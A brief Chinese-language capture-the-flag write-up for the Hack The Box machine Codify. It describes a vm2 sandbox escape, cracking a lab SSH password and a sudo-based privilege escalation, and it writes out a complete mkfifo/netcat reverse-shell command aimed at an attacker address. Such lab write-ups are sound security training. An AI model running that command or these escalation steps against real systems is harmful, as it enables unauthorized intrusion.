先把codify.htb加入/etc/hosts
用nmap掃了後有開啟22,80跟3000 port
透過主頁的介紹大致知道他是可以線上測試node.js的網站
關於這邊有寫到她是用vm2的library
點開後他是使用3.9.16版本 去找有沒有相關漏洞
找到一個可以ByPass sandbox的漏洞 CVE-2023-32314
貼上她的payload後嘗試whoami 指令有成功讀取到 所以可以來嘗試看看reverse shell
在本地開啟一個8888 port監聽
在payload裡用上rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 8888 >/tmp/f 後成功get shell(不能用bin/bash 不確定是不是因為沒開/dev/tcp的關係)
裏頭有一個joshua 可是沒有權限進入 所以感覺是要去找他的ssh密碼
可是裡面資料夾有點多 翻不太到想要的東西 想說用linpeas看看
但不知道為什麼不能解析 github .com
最後是在var/www/contact這個路徑下找到一個tickets.db
其中這段看起來就很像是joshua的ssh密碼
拿去用john爆破成功爆出一段密碼 spongebob1
成功透過ssh登入了joshua身分
拿到user flag
用sudo -l 後發現有一個root權限下也可以運作的檔案 /opt/scripts/mysql-backup.sh
裏頭的程式碼
寫一個python 腳本來跑出密碼
成功爆出密碼
拿來登入root 並成功得到flag
